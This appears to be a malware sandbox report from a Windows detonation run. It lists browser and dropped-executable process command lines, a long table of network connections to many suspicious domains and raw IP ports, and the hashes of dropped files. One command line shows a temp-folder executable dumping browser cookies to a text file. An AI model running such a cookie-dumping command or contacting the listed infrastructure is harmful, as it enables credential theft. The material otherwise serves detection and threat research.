"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1c8,0x1cc,0x1d0,0x1a4,0x1d4,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:1
Network
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.62.3:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 185.230.143.48:14462 | tcp | |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 52.219.62.3:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.9.187:80 | proxycheck.io | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 52.219.156.22:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.156.22:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 185.49.70.90:2080 | 185.49.70.90 | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 62.172.138.35:80 | geo.netsupportsoftware.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 95.181.152.223:52383 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 2.18.105.186:80 | go.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 168.61.182.58:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 52.178.182.73:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 2.22.22.210:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 131.253.33.203:443 | tcp | |
| N/A | 2.22.23.154:443 | tcp | |
| N/A | 2.22.23.154:443 | tcp | |
| N/A | 13.32.240.21:443 | tcp | |
| N/A | 2.22.22.219:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 40.126.31.137:443 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.16.203.237:443 | www.mediafire.com | tcp |
| N/A | 199.91.155.72:443 | download2331.mediafire.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.21.29.4:80 | cache.uutww77.com | tcp |
| N/A | 81.16.141.193:80 | tcp | |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 212.32.249.110:443 | tcp | |
| N/A | 3.229.58.197:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 174.139.78.106:439 | tcp | |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 2.22.23.154:443 | tcp | |
| N/A | 172.67.137.37:443 | mybrowserinfo.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 2.22.147.26:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 20.50.102.62:443 | tcp | |
| N/A | 54.224.34.30:443 | paybiz.herokuapp.com | tcp |
| N/A | 23.51.123.27:80 | tl.symcd.com | tcp |
| N/A | 23.51.123.27:80 | tl.symcd.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 2.22.147.26:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 3.86.130.101:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.22.65.104:443 | tcp | |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.26.6.228:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 104.97.15.51:443 | tcp | |
| N/A | 2.17.34.102:443 | tcp | |
| N/A | 2.22.22.225:443 | tcp | |
| N/A | 127.0.0.1:5985 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 2.17.34.102:443 | tcp | |
| N/A | 2.17.34.102:443 | tcp | |
| N/A | 2.22.147.26:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.17.34.102:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.22.208:443 | tcp | |
| N/A | 2.22.147.26:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.17.34.135:443 | tcp | |
| N/A | 2.22.22.208:443 | tcp | |
| N/A | 2.22.22.208:443 | tcp | |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 2.17.34.135:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 172.67.191.238:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 157.240.27.35:443 | www.facebook.com | tcp |
| N/A | 2.22.147.26:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 2.22.147.26:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.159:443 | tcp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 139.45.197.238:443 | tcp | |
| N/A | 139.45.197.159:443 | tcp | |
| N/A | 87.250.251.119:443 | tcp | |
| N/A | 139.45.197.251:443 | tcp | |
| N/A | 172.67.10.98:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.110.191.14:80 | repository.certum.pl | tcp |
| N/A | 139.45.197.251:443 | tcp | |
| N/A | 87.250.251.119:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 35.201.70.46:80 | www.directdexchange.com | tcp |
| N/A | 35.201.70.46:80 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 157.240.241.35:443 | www.facebook.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 2.22.22.217:443 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 131.253.33.203:443 | tcp | |
| N/A | 2.17.34.140:443 | tcp | |
| N/A | 2.17.34.140:443 | tcp | |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 13.32.240.85:443 | tcp | |
| N/A | 2.22.22.209:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 2.17.34.140:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 131.253.33.203:443 | tcp | |
| N/A | 2.17.34.140:443 | tcp | |
| N/A | 2.17.34.140:443 | tcp | |
| N/A | 13.32.240.85:443 | tcp | |
| N/A | 2.22.22.209:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 35.201.70.46:443 | tcp | |
| N/A | 35.201.70.46:443 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 2.22.147.75:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 2.22.147.50:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 172.67.191.238:443 | tcp | |
| N/A | 172.67.191.238:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 2.22.147.50:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
Files
| MD5 | ad9d32f656a53feb70f09fa54040b9c0 |
| SHA1 | dd4883dd089ef1490dc018eaaa6ed72b9b26f79b |
| SHA256 | f98183a2ad674f8aae6ad47e7da8b48c80175148ba333f0f57b3e6eca64bfaa6 |
| SHA512 | c24c3697bb5dc73d3f24caff4c2819d6bfb78061492b11f9c2e1e1abb9ad872903af64e14e3b973671906e985bd8011e838cbfe5cfabb615e31a39c5abe70a43 |
memory/4180-193-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe
| MD5 | 3b4348d187f24c82370836531f3fa94e |
| SHA1 | a2ca4e9f4a8d9c8634e42765e90e252803e20b15 |
| SHA256 | cd189a8c952420bf33b68cce03b41900e8c784b1010213b097ecdb2d7e8079f7 |
| SHA512 | 2bab3c1e38a21cefc06363db75931bf3bfe0b4ee3f089293a750dfc866abc32c7135d2d9ba7ccb005aa01ad02d0a75a5fa02f85ca78cc8fe637615b7fa9e7394 |
memory/792-224-0x0000000000910000-0x000000000092C000-memory.dmp
memory/4508-227-0x0000000004B60000-0x0000000004B61000-memory.dmp
memory/3860-226-0x0000000005790000-0x0000000005791000-memory.dmp
memory/3860-223-0x00000000056F0000-0x00000000056F1000-memory.dmp
memory/444-222-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe
| MD5 | cfa84b10c7c5ff391859a425abae49e7 |
| SHA1 | 2aa794ec012ad2491b463c983b0a7b8a3beb72c4 |
| SHA256 | 07c1c45477b082547fe2b3ad9bea525ffca2aebc80bc6c96b1f263904db7fbd1 |
| SHA512 | f6b9ac777f9b357b4da4f5653f562631b55514516eb20c2fda63d85d15ed5d572e14887e5f0a10ebdc494188d2da3af7d53171159ef303719f12def0a4f8f5db |
